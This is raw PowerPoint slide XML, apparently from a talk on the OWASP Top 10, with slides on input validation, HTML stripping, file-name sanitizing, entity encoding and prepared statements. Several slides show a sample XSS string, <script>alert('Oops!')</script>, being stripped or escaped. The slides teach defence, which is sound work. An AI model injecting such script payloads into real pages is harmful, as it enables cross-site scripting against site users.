            <a:ext cx="10074513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38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C6DD6-AFE7-44F7-B0D2-B3112B2DA9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2936769" y="2828835"/>
            <a:ext cx="6318461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OWASP</a:t>
            </a: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 TOP 10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E031A-FF8B-4359-913C-06341B52315F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114090" y="4029164"/>
            <a:ext cx="996381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  <a:cs typeface="CordiaUPC" panose="020B0502040204020203" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>Introduction and Prevention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34488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DFBA13-3455-48BD-97CD-36729C83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357874"/>
            <a:ext cx="10074513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8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EF607F-E0FA-4600-82CE-25074C8F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357874"/>
            <a:ext cx="10074513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1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0C07ED9-432B-4436-AAE6-1598C9D1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357874"/>
            <a:ext cx="10074513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51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DD2FE3-576F-4D7C-B107-0C4F3951E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9" y="1060450"/>
            <a:ext cx="11314902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3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3926D99-EF01-4620-8533-6E5205078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3" y="152116"/>
            <a:ext cx="10074513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9F686-A782-443D-A71C-366E8888E295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2937122" y="2967335"/>
            <a:ext cx="6317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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ノ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="5400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>°</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Cyrl-AZ" sz="5400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Д°）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ノ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="5400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>︵ ┻━┻</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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66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907127" y="2998113"/>
            <a:ext cx="2750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5025284" y="3009900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9004300" y="3009900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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92511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4720623" y="366068"/>
            <a:ext cx="2750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9673484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7E4F3-1079-49BD-83F3-E99AFCE77399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2649670" y="1714500"/>
            <a:ext cx="6892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Validate user input at the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first entry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point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Refuse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to continue without a valid input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16A62-04D2-4DA0-99F3-E66B1B83C54E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="40767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example@example.com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BA159-5538-4DB3-9B35-5A5A80BE1DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="453390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Example-example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C3A64-5F3E-4DDB-8320-BF86DA512FF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="4991100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https://example.com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FB4FF-83C7-4F12-8FD0-E48A9B214955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632648" y="3126432"/>
            <a:ext cx="6926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know the exact data format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4213418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4790192" y="366068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07E4F3-1079-49BD-83F3-E99AFCE77399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7125005" y="2110768"/>
            <a:ext cx="68926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Validate user input at the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first entry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point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Refuse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to continue without a valid input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FB4FF-83C7-4F12-8FD0-E48A9B214955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7159052" y="3429000"/>
            <a:ext cx="6926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know the exact data format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85277-95A7-4464-A407-AB6077EAE42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2431512" y="2110768"/>
            <a:ext cx="732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user input, but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clean-up before use</a:t>
            </a:r>
          </a:p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Strip HTML tags, unnecessary characters,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05171-3BF2-449F-9794-63136690EA4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2265887" y="3429000"/>
            <a:ext cx="7660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cannot immediately reject input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1305F4-34ED-48CF-B71A-ED74D39E6270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="324522" y="4671854"/>
            <a:ext cx="9668691" cy="369332"/>
            <a:chOff x="324522" y="4392414"/>
            <a:chExt cx="9668691" cy="36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4BB54-5805-4048-AE09-DBDC0E7ABC5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="4392414"/>
              <a:ext cx="6128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Strip HTML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&lt;script&gt;alert(‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i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’);&lt;/script&gt;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49D68E-0260-4440-9788-FAD3BB4B224F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="4392414"/>
              <a:ext cx="2717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alert(‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1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’);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79F895D-4545-451C-A8B8-963CA7E96A7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="4470400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B8945A-037B-4CB2-9DDA-BA68ADBE01B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="324522" y="5096828"/>
            <a:ext cx="11416320" cy="369332"/>
            <a:chOff x="324522" y="5249426"/>
            <a:chExt cx="11416320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EFB6C0-F8FF-4BC9-9B09-4760F4C8B45D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="5249426"/>
              <a:ext cx="52856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Sanitize file name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my-awesome-song-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*****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.mp3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345F1C-96F7-4889-9CC0-37576F8516AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="5249426"/>
              <a:ext cx="4465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my-awesome-song-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1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_____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.mp3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35DB9B6-2DEE-4B12-838F-20045F9DB3D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="5327412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4884E-A7C3-4391-A1CE-72BD5BC5BCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="324522" y="4246880"/>
            <a:ext cx="7895769" cy="369332"/>
            <a:chOff x="324522" y="4392414"/>
            <a:chExt cx="7895769" cy="3693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AFD8D0-B70B-4FCD-B6F2-2A478C5DC8A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="4392414"/>
              <a:ext cx="6128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Strip HTML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&lt;script&gt;alert(‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i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’);&lt;/script&gt;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A6948F-B972-42E9-8527-5674613EB862}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="4392414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FAF0DFEB-EEBE-4A44-BC70-22E38C8472AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="4470400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085A90-FC15-4851-B83A-2915BE4219CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="324522" y="5521802"/>
            <a:ext cx="11416320" cy="369332"/>
            <a:chOff x="324522" y="5249426"/>
            <a:chExt cx="11416320" cy="3693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64AC02-1696-4DBD-B265-6B59F8D54808}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="5249426"/>
              <a:ext cx="4496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HTML Class name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my-class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your-class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219D93-C4DA-486B-A2D3-45278A032527}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="5249426"/>
              <a:ext cx="4465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</a:t>
              </a:r>
              <a:r>
                <a:rPr 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class</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1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_</a:t>
              </a:r>
              <a:r>
                <a:rPr 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your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-class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46503D1-CC19-45A5-AF18-DAFB1515BE0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="5327412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000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85277-95A7-4464-A407-AB6077EAE42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7493538" y="2110768"/>
            <a:ext cx="7328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Accept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user input, but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clean-up before use</a:t>
            </a:r>
          </a:p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Strip HTML tags, unnecessary characters,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905171-3BF2-449F-9794-63136690EA4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7868713" y="3429000"/>
            <a:ext cx="7660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cannot immediately reject input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1305F4-34ED-48CF-B71A-ED74D39E6270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-11067378" y="4671854"/>
            <a:ext cx="9668691" cy="369332"/>
            <a:chOff x="324522" y="4392414"/>
            <a:chExt cx="9668691" cy="3693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4BB54-5805-4048-AE09-DBDC0E7ABC5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="4392414"/>
              <a:ext cx="6128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Strip HTML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&lt;script&gt;alert(‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i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’);&lt;/script&gt;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49D68E-0260-4440-9788-FAD3BB4B224F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="4392414"/>
              <a:ext cx="2717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alert(‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1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’);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79F895D-4545-451C-A8B8-963CA7E96A7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="4470400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B8945A-037B-4CB2-9DDA-BA68ADBE01B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-11086428" y="5096828"/>
            <a:ext cx="11416320" cy="369332"/>
            <a:chOff x="324522" y="5249426"/>
            <a:chExt cx="11416320" cy="3693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EFB6C0-F8FF-4BC9-9B09-4760F4C8B45D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="5249426"/>
              <a:ext cx="52856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Sanitize file name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my-awesome-song-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*****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.mp3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345F1C-96F7-4889-9CC0-37576F8516AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="5249426"/>
              <a:ext cx="4465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my-awesome-song-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>_____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.mp3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035DB9B6-2DEE-4B12-838F-20045F9DB3D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="5327412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A4884E-A7C3-4391-A1CE-72BD5BC5BCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-11067378" y="4246880"/>
            <a:ext cx="7895769" cy="369332"/>
            <a:chOff x="324522" y="4392414"/>
            <a:chExt cx="7895769" cy="3693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AFD8D0-B70B-4FCD-B6F2-2A478C5DC8A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="4392414"/>
              <a:ext cx="61281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Strip HTML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 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&lt;script&gt;alert(‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i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’);&lt;/script&gt;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A6948F-B972-42E9-8527-5674613EB862}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="4392414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How to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FAF0DFEB-EEBE-4A44-BC70-22E38C8472AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="4470400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085A90-FC15-4851-B83A-2915BE4219CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-11067378" y="5521802"/>
            <a:ext cx="11416320" cy="369332"/>
            <a:chOff x="324522" y="5249426"/>
            <a:chExt cx="11416320" cy="3693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564AC02-1696-4DBD-B265-6B59F8D54808}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324522" y="5249426"/>
              <a:ext cx="4496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rPr>
                <a:t>HTML Class name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my-class</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i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&gt;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your-class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219D93-C4DA-486B-A2D3-45278A032527}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7275802" y="5249426"/>
              <a:ext cx="4465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my-</a:t>
              </a:r>
              <a:r>
                <a:rPr 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class</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>_</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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your</a:t>
              </a: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</a:rPr>
                <a:t>-class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A46503D1-CC19-45A5-AF18-DAFB1515BE0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701678" y="5327412"/>
              <a:ext cx="325120" cy="21336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6A7D713-0D9D-4585-8058-FD3DA298B0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2067268" y="2110767"/>
            <a:ext cx="8057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Neutralize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harmful characters with counterparts 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without modifying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the meaning/appearance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E783C-32E2-40A7-A131-90855FF91201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389842" y="3429000"/>
            <a:ext cx="5412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output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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295704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C6DD6-AFE7-44F7-B0D2-B3112B2DA9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2936769" y="2828835"/>
            <a:ext cx="6318461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OWASP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yriad Pro Light" panose="020B0603030403020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:cs typeface="CordiaUPC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94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Word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A7D713-0D9D-4585-8058-FD3DA298B0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200619" y="7076192"/>
            <a:ext cx="8057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Neutralize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harmful characters with counterparts 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without modifying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the meaning/appearance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E783C-32E2-40A7-A131-90855FF91201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523192" y="8189950"/>
            <a:ext cx="5412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output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6C0FF-9482-4642-8A3C-934515E119EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826654" y="1227842"/>
            <a:ext cx="68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Replace HTML special characters with HTML entities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78320-96A4-4560-A488-870D1FE4E01D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3153367" y="1972855"/>
            <a:ext cx="5458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&lt;script&gt;alert(“Oops!”)&lt;/script&gt;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869763-F266-41D7-9C90-FAB93EE8642F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2696170" y="2626359"/>
            <a:ext cx="6805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lt;script&amp;gt;alert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(“Oops!”)&amp;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lt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;/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script&amp;gt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2EC01F1-304D-4A5A-8386-07BD69B5C09B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5960108" y="2367289"/>
            <a:ext cx="325120" cy="2133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DE003E-629E-42DB-AB62-8719318DA28A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2693466" y="3063008"/>
            <a:ext cx="6468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&lt;  script &gt;  alert(“Oops!”) &lt;  /script&gt;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EF5B08-27B8-413C-9519-E788217F78B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1233487" y="3887161"/>
            <a:ext cx="9725025" cy="6362700"/>
            <a:chOff x="1233487" y="3887161"/>
            <a:chExt cx="9725025" cy="6362700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Picture 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D62F4B6-F5D4-4E00-90AE-8513463C3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87" y="3887161"/>
              <a:ext cx="9725025" cy="63627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01343E-707B-4E3F-AFEA-D3907102727A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1568867" y="4731798"/>
              <a:ext cx="5728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Ayesh’s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talk is &lt;script&gt;alert(“Oops!”)&lt;/script&gt;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19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3" grpId="0"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="3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A7D713-0D9D-4585-8058-FD3DA298B0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200619" y="7076192"/>
            <a:ext cx="8057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Neutralize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harmful characters with counterparts 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without modifying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the meaning/appearance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E783C-32E2-40A7-A131-90855FF91201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523192" y="8189950"/>
            <a:ext cx="5412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output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6C0FF-9482-4642-8A3C-934515E119EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826654" y="9071362"/>
            <a:ext cx="680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Replace HTML special characters with HTML entities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78320-96A4-4560-A488-870D1FE4E01D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3153367" y="9816375"/>
            <a:ext cx="5458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&lt;script&gt;alert(“Oops!”)&lt;/script&gt;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869763-F266-41D7-9C90-FAB93EE8642F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2696170" y="10469879"/>
            <a:ext cx="6805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&amp;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lt;script&amp;gt;alert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(“Oops!”)&amp;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lt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;/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script&amp;gt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2EC01F1-304D-4A5A-8386-07BD69B5C09B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5960108" y="10210809"/>
            <a:ext cx="325120" cy="2133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DE003E-629E-42DB-AB62-8719318DA28A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2693466" y="10906528"/>
            <a:ext cx="6468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Ayesh’s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 talk is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&lt;  script &gt;  alert(“Oops!”) &lt;  /script&gt;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EF5B08-27B8-413C-9519-E788217F78B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1233487" y="11730681"/>
            <a:ext cx="9725025" cy="6362700"/>
            <a:chOff x="1233487" y="3887161"/>
            <a:chExt cx="9725025" cy="6362700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Picture 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D62F4B6-F5D4-4E00-90AE-8513463C3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87" y="3887161"/>
              <a:ext cx="9725025" cy="63627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01343E-707B-4E3F-AFEA-D3907102727A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1568867" y="4731798"/>
              <a:ext cx="5728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Ayesh’s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talk is &lt;script&gt;alert(“Oops!”)&lt;/script&gt;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F3F2CF8-05C9-41B4-BFEB-E0ABC213AE5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406987" y="1280357"/>
            <a:ext cx="764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MYSQL: Use Prepared statements or parameterized queries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3AC349C-6F9E-4A9E-AF60-383DDEFB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723" y="1834610"/>
            <a:ext cx="3993401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%title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3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", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="30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375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A7D713-0D9D-4585-8058-FD3DA298B0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200619" y="7076192"/>
            <a:ext cx="8057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Neutralize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harmful characters with counterparts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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without modifying 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the meaning/appearance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E783C-32E2-40A7-A131-90855FF91201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523192" y="8189950"/>
            <a:ext cx="5412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Use when you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output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 user input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F2CF8-05C9-41B4-BFEB-E0ABC213AE5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406987" y="1280357"/>
            <a:ext cx="764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MYSQL: Use Prepared statements or parameterized queries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B3AC349C-6F9E-4A9E-AF60-383DDEFBD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885" y="1840117"/>
            <a:ext cx="3993401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&lt;?php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altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
